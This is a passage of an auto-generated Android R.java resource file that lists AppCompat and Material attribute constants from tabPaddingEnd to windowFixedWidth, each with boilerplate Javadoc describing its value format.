"<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabPaddingEnd=0x7f0101b9; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabPaddingStart=0x7f0101b7; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabPaddingTop=0x7f0101b8; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabRippleColor=0x7f0101be; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabSelectedTextColor=0x7f0101b6; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int tabStyle=0x7f010136; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int tabTextAppearance=0x7f0101b4; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabTextColor=0x7f0101b5; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabUnboundedRipple=0x7f0101bf; /** Present the text in ALL CAPS. This may use a small-caps form when available. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a boolean value, either "<code>true</code>" or "<code>false</code>". */ public static final int textAllCaps=0x7f010057; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceBody1=0x7f010137; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceBody2=0x7f010138; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceButton=0x7f010139; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceCaption=0x7f01013a; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceHeadline1=0x7f01013b; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceHeadline2=0x7f01013c; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceHeadline3=0x7f01013d; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceHeadline4=0x7f01013e; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceHeadline5=0x7f01013f; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceHeadline6=0x7f010140; /** Text color, typeface, size, and style for the text inside of a popup menu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceLargePopupMenu=0x7f010087; /** The preferred TextAppearance for the primary text of list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceListItem=0x7f0100ad; /** The preferred TextAppearance for the secondary text of list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceListItemSecondary=0x7f0100ae; /** The preferred TextAppearance for the primary text of small list items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceListItemSmall=0x7f0100af; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceOverline=0x7f010141; /** Text color, typeface, size, and style for header text inside of a popup menu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearancePopupMenuHeader=0x7f010089; /** Text color, typeface, size, and style for system search result subtitle. Defaults to primary inverse text color. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceSearchResultSubtitle=0x7f0100a3; /** Text color, typeface, size, and style for system search result title. Defaults to primary inverse text color. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceSearchResultTitle=0x7f0100a2; /** Text color, typeface, size, and style for small text inside of a popup menu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceSmallPopupMenu=0x7f010088; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceSubtitle1=0x7f010142; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textAppearanceSubtitle2=0x7f010143; /** Color of list item text in alert dialogs. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int textColorAlertDialogListItem=0x7f0100c2; /** Text color for urls in search suggestions, used by things like global search <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int textColorSearchUrl=0x7f0100a4; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int textEndPadding=0x7f010170; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int textInputStyle=0x7f010144; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int textStartPadding=0x7f01016f; /** Deprecated. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int theme=0x7f010121; /** The thickness (stroke size) for the bar paint <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int thickness=0x7f0100e2; /** Amount of padding on either side of text within the switch thumb. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int thumbTextPadding=0x7f010108; /** Tint to apply to the thumb drawable. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int thumbTint=0x7f010103; /** Blending mode used to apply the thumb tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and drawable color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int thumbTintMode=0x7f010104; /** Drawable displayed at each progress position on a seekbar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int tickMark=0x7f010054; /** Tint to apply to the tick mark drawable. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tickMarkTint=0x7f010055; /** Blending mode used to apply the tick mark tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and drawable color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int tickMarkTintMode=0x7f010056; /** Tint to apply to the image source. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tint=0x7f010052; /** Blending mode used to apply the image source tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int tintMode=0x7f010053; /** <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int title=0x7f01002c; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleEnabled=0x7f010188; /** Specifies extra space on the left, start, right and end sides of the toolbar's title. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleMargin=0x7f010110; /** Specifies extra space on the bottom side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleMarginBottom=0x7f010114; /** Specifies extra space on the end side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleMarginEnd=0x7f010112; /** Specifies extra space on the start side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleMarginStart=0x7f010111; /** Specifies extra space on the top side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleMarginTop=0x7f010113; /** {@deprecated Use titleMargin} <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ @Deprecated public static final int titleMargins=0x7f010115; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int titleTextAppearance=0x7f01010e; /** A color to apply to the title string. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int titleTextColor=0x7f01011d; /** Specifies a style to use for title text. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int titleTextStyle=0x7f010030; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int toolbarId=0x7f010183; /** Default Toolar NavigationButtonStyle <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int toolbarNavigationButtonStyle=0x7f01009c; /** Default Toolbar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int toolbarStyle=0x7f01009b; /** Foreground color to use for tooltips <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int tooltipForegroundColor=0x7f0100d5; /** Background to use for tooltips <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int tooltipFrameBackground=0x7f0100d4; /** The tooltip text associated with the item. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tooltipText=0x7f0100ed; /** Drawable to use as the "track" that the switch thumb slides within. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int track=0x7f010105; /** Tint to apply to the track. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int trackTint=0x7f010106; /** Blending mode used to apply the track tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and drawable color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int trackTintMode=0x7f010107; /** The index of the font in the tcc font file. If the font file referenced is not in the tcc format, this attribute needs not be specified. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int ttcIndex=0x7f0101f0; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int useCompatPadding=0x7f010190; /** <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int viewInflaterClass=0x7f0100d7; /** Voice button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int voiceIcon=0x7f0100fe; /** Flag indicating whether this window should have an Action Bar in place of the usual title bar. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowActionBar=0x7f010061; /** Flag indicating whether this window's Action Bar should overlay application content. Does nothing if the window would not have an Action Bar. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowActionBarOverlay=0x7f010063; /** Flag indicating whether action modes should overlay window content when there is not reserved space for their UI (such as an Action Bar). <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowActionModeOverlay=0x7f010064; /** A fixed height for the window along the major axis of the screen, that is, when in portrait. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowFixedHeightMajor=0x7f010068; /** A fixed height for the window along the minor axis of the screen, that is, when in landscape. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int windowFixedHeightMinor=0x7f010066; /** A fixed width for the window along the major axis of the screen, that is, when in landscape. Can be either an absolute dimension or a fraction of the screen size in that dimension. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px 